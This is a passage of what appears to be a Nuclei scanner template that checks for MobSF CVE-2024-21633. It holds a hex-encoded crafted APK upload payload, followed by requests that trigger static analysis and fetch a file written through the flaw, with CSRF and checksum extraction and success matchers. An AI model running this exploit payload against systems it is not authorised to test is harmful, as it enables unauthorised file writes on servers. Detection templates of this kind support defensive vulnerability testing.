40d4e602b73e1b9dbcfbc0c092f5f9517fc30f0dca7be4795dbc1012d6d314ce9421a16254b180723a951ef57a02e073135b6c220767b10b7eef9deae075b9564ebb6ef530377c1df8b9676f7e2036af492388e2d8603b82f8d4b1398521619aeab77fcd08d534a89435a660cb1ac401899426c9fc5451e52fdb91bdd633aa96bbd28a6ca332fa6a55eb0edbd845898b9bf432bbe1b015f00d3075e7a95b996477a3478caaf29eff4c3dd65714b1c8a4505deb4def7f67be12012a1897d632fd9ac262be130d7c2e059560e864439f84ab9ebeed1d25210f70f2859a564932a2f3ca8cabeeb0f3cd0191c3d2fa2ca0624a48227a21a774599f4abc0af2660939f3321fffbfd456fc71df83135b7c542f82a1bbd60cb5b15dda8ef7bfd88d55cb97ce932542b803803d7a7a3ebbe1bef84fddd456fcf833440e5d1bb83987544ae5146702b6d16c5dddea61a3c583b406779d070eaa3a01717a9bcfe7d6f37dcf76859587600962c07b6ac209d97a19e03d9a4e039287604da50e430394d5c0b550d708bcc41f55fc42a61335595bd414c3578b0f7aaace2b4baf13cece7fa9043516cbeacbd91a96c495435248b50cd20966c4bdc2adc4a968a58476c20a6882b68ab688fa1df425bc3fd31c4a7109f467c06f114e2b36867d05e447b15791f23fe94db71eb1ae2cfd0bf688b6cbe0474caeaa27719ed0ab2ee21be8f7603ed43b45f733b6d3d46fc1dda1ff1fc4fb67452795326cd0b46ab46882dcf4b2bba5572a4ee6ff28a6669b0680d8949e58e4ab51a68da51126aa9482d6754ed30552f52cd8c6aa4d413c64e8d487619fc23e01f1b1215fcb4f933db27766596853bda202b55ebf815d53ad1561da5fb4a5e31ad718076bb04b0058727b8d5ad938e06ee07ba55efca8f5fa943d2a67277145fc75e5de549c98ec4f7d44e056d1af5b162d49359d4238713b48ad446461d3d4cad15a9cd8c5a4da917851626cf791a7266e9c890ce10fa154449a32640ee08b292239f73089386bd469c32c529916ff34f2234adff3b4dab560bd0f9b6eca8c2d946ae7c84e0e0be5070cf3a3a58d39ac53b18aa591f00fab02dc3f312ec19dd56ae504eae5095f7150aed18da7af389c86bac20055300e2f888c7c32451c44607d261015ec6c6b9c2f090d8f0f6e9a412e99b218aa480c78b05fc242be089b4808ea8890d81c896d3206015eb7a834096735d0259c2e206a68bb571e003e628cdbf88383a3ecb86df9965c30a07e7c835d0f00bd06bae4d985e806e03ba21d4c31a315f9965d7b2e60584e70250e4eef8ebb2699cac19c6524d358cf69dd765d938cdab27c4bfd9554558b7ba25b1a87735b1f8bcabf3406fa5ad273b8452d67ef02b776c9eb6d299c0969c487b59e6f553a96a138734ff60a9c944b627796ea390c26ada752ca1b5c220df857e127da58bbe5a2f90bfca914deb418686a453682061cfbcd34472670ad78de655d138670a03a7f0d1c9f783995e20c3a15971a8911ed2ac75d6647c480b3d34d5fc5dc6dccf1e997b8da3f36d0df74a7c6f2dddb3db7a41233dd5a8844366e4864c43749460c93d8f90a9e6e413bebab55988850f7d32b11a9f580dba0cd2bc99d3b98e763237325369236443db447bb6f90c15697245a60f29c226b7947cc45431b1eb18fb66c61b92464eeb31b40df1721e84dabcc9ea24dbe7e03d308cf08451845bbe815bbe6d2be2165665f6ddb9cefb5ae27d6cf381fc9b88e3d338902a1bc839f298ab5fe6757ac2674de1e3a83a94c7f83da01fda15ce10950006f7b512847cf3e8d9e433a92533a927a368f0517c7244b8e385d154b8cae7b820a5ce0c8ee80caa3fc905e263494d782941fe38172c1dd499ff715027de69a0a30615ff1b98f84fff1b78ef1f99e4b3df2a7ef6ddecb37f3e99f47f00504b0708cf301cf4f1050000650e0000504b03041400080808009badf6580000000000000000000000001c0000006b6f746c696e2d746f6f6c696e672d6d657461646174612e6a736f6e8d92416b83401085eff915e25996e6d4b4b7524a4b432090901e4a0fa34eeca6ebee323b964af0bf775d63d426875e14def7e6f17c789c4551ecb24f2c6187e4a4d1f17d14cfc55cdcc449cbd24aaa7c533bc6b225cf04b9c20b34ba5d88db115eabaa904137548803724a20b5135f8695d4a20871c206975806f141e764e4e9f28dc05aa48bc449d9bbbeac2573c08c37c82c75e13c3d7ad903e95e4a6b9f34a40a732f335598f4e8d1941658a65249ae57c89003c30e4882e6e1640fca0d37cbf5ea0ff2a41997d80215c86d87f770d435f19c03f8e724bef574962e364efa34ab80f786ca6d6db1cd84cef6fa5d0e1efc6182618da09d7c13b1fd154c45194e16e9365e9ce3461f71d577b635b3f1bb7d7ecc9a5f504b070820bd79071601000071020000504b01020a000a00000800009badf658ef61a43018030000180300000e00000000000000000000000000000000007265736f75726365732e61727363504b010214001400080808009badf6581322908e99000000010100001200000000000000000000000000440300007265732f7261772f6861636b65642e747874504b010214001400080808009badf65810fa89ae1b0200004405000013000000000000000000000000001d040000416e64726f69644d616e69666573742e786d6c504b010214001400080808009badf658ed8a3bcb0c050000470d00002400000000000000000000000000790600006b6f746c696e2f72616e6765732f72616e6765732e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf65881092a85f20400005c0900002600000000000000000000000000d70b00006b6f746c696e2f7265666c6563742f7265666c6563742e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf6580d33d2d88a0100008602000028000000000000000000000000001d1100006b6f746c696e2f696e7465726e616c2f696e7465726e616c2e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf6584670788e31020000a00300002c00000000000000000000000000fd1200006b6f746c696e2f616e6e6f746174696f6e2f616e6e6f746174696f6e2e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf658dd897ff784140000d04800001d00000000000000000000000000881500006b6f746c696e2f6b6f746c696e2e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf65843e19fc69d000000c80000002c00000000000000000000000000572a00006b6f746c696e2f636f726f7574696e65732f636f726f7574696e65732e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf658cf301cf4f1050000650e00002e000000000000000000000000004e2b00006b6f746c696e2f636f6c6c656374696f6e732f636f6c6c656374696f6e732e6b6f746c696e5f6275696c74696e73504b010214001400080808009badf65820bd790716010000710200001c000000000000000000000000009b3100006b6f746c696e2d746f6f6c696e672d6d657461646174612e6a736f6e504b0506000000000b000b005e030000fb3200000000')}}
        ------WebKitFormBoundaryBHBsnUK0pDAzKttf--        

      - |
        GET /static_analyzer/?name=poc.apk&checksum={{appchecksum}}&type=apk HTTP/1.1
        Host: {{Hostname}}        

      - |
        GET /download/mobsf-cve-2024-21633.txt HTTP/1.1
        Host: {{Hostname}}        

    extractors:
      - type: regex
        name: csrf_token
        part: body
        internal: true
        group: 1
        regex:
          - '<input\stype="hidden"\sname="csrfmiddlewaretoken"\svalue="(.*?)">'

      - type: json
        name: appchecksum
        part: body
        internal: true
        json:
          - ".hash"

    matchers-condition: and
    matchers:
      - type: word
        part: body_4
        words:
          - "4acbfc74a3002cecf92e81c2a9ac75ada8acabf8f7b40706c5667efbd33be8450d67a3f2f7234f0cd3873de5fee64643d4bd5ed23a1f2c295c7ea0dabcb522ca420f2d91afcfe5b62708c9b90d51dc4ae5a81d7f2ea1befafa31920565074032a2775427dfffe63e97d46e89bcec3cd7ca81411609d98a5c4b1264db69bfe76c"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b6bb2150a2cfa4a0abee35ab118acdf1390f678f1563660e2962add43653b2da02201bd4ba2e672907185b406abb6c0572a0b79f385262df3085ebd5e6b62b9def65:922c64590222798bb761d5b6d8e72950